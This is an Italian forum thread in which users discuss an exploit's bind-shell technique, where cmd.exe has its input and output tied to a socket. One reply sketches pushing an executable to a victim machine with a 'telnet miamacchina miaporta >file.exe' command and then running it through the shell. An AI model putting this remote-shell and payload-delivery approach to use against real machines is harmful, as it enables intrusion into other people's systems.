incredibile!! O.o

[71104]

guardate qua ...

non è tanto l'exploit della keybd_event la cosa che mi stupisce (capirai, è assai banale, nella maggior parte dei desktop è pure inutile se ho capito come funziona...), ma quello che viene eseguito nella funzione BindShell!!

viene creato un processo cmd.exe i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!!

ma si può fare?

cioè, Winsock2 è fatto apposta per fornire shell remote agli hackers che installano trojans o sbaglio...?

se è così mi cade giusto a fagiuuoolo

[tglman]

Si infatti cosa molto banale ma estremamente pericolosa, per esempio tanto per pensare un pò da hacker qundo si ha a disposizione una cosa del genere ti e sufficente fare un programmino che ti apre un socket in listent e appena arriva una connessione ti ci invia un file per poi eseguire sulla macchina remota una stringa del genere:

Codice:

telnet miamacchina miaporta >file.exe

per poter inviare un file exe che mi faccia un mondo di cose su quella macchina....

a logicamente per eseguirlo hai a disposizione la scell

Cavolo che fico!!!

[ilsensine]

Quote:

Originariamente inviato da 71104

...i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!!

ma si può fare?

Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).

[71104]

Quote:

Originariamente inviato da ilsensine

Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).

lo so che non è un bug, e anche se non si potesse fare si farebbe comunque in altra maniera (ad es. su Windows con una pipe); solo che fatto proprio così come dire mi sembrava un po' troppo esplicito, ecco
e poi lo so che può tornare mooolto comodo, ehehehe lo so eccome